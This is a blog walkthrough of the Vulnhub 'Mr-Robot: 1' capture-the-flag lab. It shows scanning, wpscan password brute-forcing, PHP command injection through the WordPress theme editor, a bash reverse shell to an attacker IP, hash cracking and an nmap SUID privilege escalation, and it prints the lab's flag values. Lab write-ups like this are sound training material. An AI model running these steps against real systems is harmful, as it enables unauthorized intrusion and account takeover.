Monday, October 14, 2019

Vulnhub: Mr-Robot: 1

source: https://www.vulnhub.com/entry/mr-robot-1,151/

192.168.1.103

80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd

+ OSVDB-3092: /admin/: This might be interesting…
+ Uncommon header 'link' found, with contents: <http://192.168.1.103/?p=23>; rel=shortlink
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress: A Wordpress installation was found.
+ /wp-admin/wp-login.php: Wordpress login found
+ /wordpresswp-admin/wp-login.php: Wordpress login found
+ /blog/wp-login.php: Wordpress login found
+ /wp-login.php: Wordpress login found
+ /wordpresswp-login.php: Wordpress login found

http://192.168.1.103/feed/
wordpress v4.3.20

http://192.168.1.103/robots.txt
User-agent: *
fsocity.dic
key-1-of-3.txt

http://192.168.1.103/key-1-of-3.txt
073403c8a58a1f80d943455fb30724b9

http://192.168.1.103/fsocity.dic

https://mrrobot.fandom.com/wiki/Characters
username elliot

cat fsocity.dic | sort | uniq > fsocity_uniq.dic

wpscan --url http://192.168.1.103 --usernames elliot -P ./fsocity_uniq.dic
username elliot, password ER28-0652

wpscan --url http://192.168.1.103 --usernames mich05654 -P ./fsocity_uniq.dic
username mich05654, password Dylan_2791

Appearance->Editor 404.php
http://192.168.1.103/404.php

system(‘ls -la’);
system(‘cat you-will-never-guess-this-file-name.txt’);
hello there person who found me.

reverse shell:
system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.90/443 0>&1'");

find / -type f -name “key-2-of-3.txt” 2>/dev/null
/home/robot/key-2-of-3.txt

ls -l /home/robot
key-2-of-3.txt
password.raw-md5

cat /home/robot/password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

john:
username robot, password abcdefghijklmnopqrstuvwxyz

python -c “import pty; pty.spawn(‘/bin/bash’);”
su robot
cat /home/robot/key-2-of-3.txt
822c73956184f694993bede3eb39f959

find / -perm -u=s 2>/dev/null
nmap --interactive
!sh
cat /root/key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4


Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)